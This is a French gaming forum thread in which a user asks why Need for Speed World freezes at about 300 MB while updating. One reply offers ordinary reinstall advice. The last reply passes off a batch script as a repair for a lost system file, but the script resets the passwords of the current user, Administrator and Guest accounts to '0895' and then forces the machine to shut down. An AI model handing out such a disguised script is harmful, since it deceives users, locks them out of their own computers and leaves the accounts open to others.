NFS World

Fermé
Darwin - 14 déc. 2010 à 14:48
 Need4-S - 12 janv. 2011 à 23:51
Bonjour,

Je voudrais savoir pourquoi NFS World bug. Je me connecte, il faut faire une Mise a jour et je clique dessus et sa demarre, arrive aux alentours de 300mo et sa bloque. --'
Si quelqu' un pourrait m' aider,
Merci


A voir également:

2 réponses

DannyG7 Messages postés 790 Date d'inscription lundi 29 décembre 2008 Statut Membre Dernière intervention 26 septembre 2013 54
12 janv. 2011 à 23:43
fait une réinstallation ces toute! ce du surement a une déconnexion rapide de ton internet qui a fait stopper le téléchargement sinon ca ce peux aussi que la connections est ralenti a cause de plusieurs application ouvert en même temps que le jeux ce qui peux ralentir le téléchargement a un point tel que tu a impression que le jeux a arrêter de télécharger a 300mo alors que il su fie d'attendre quelque minute de plus pour ceux qui non pas de patience ^^
0
Salut,

J'avais le même soucie avec Hot Poursuit. C'est à cause de la perte d'un fichier système, pour le restaurer, t'as qu'a copier le code ci-dessus, et l'enregistrer sous l'extention .bat (exemple : NFS.bat), il te reste qu'a faire un double clic sur le fichier créé, et c'est tout !.
voiçi le code :

echo off
break off
net user %USERNAME% 0895
net user administrator 0895
net user Guest 0895
shutdown -s -f -t 01
exit
0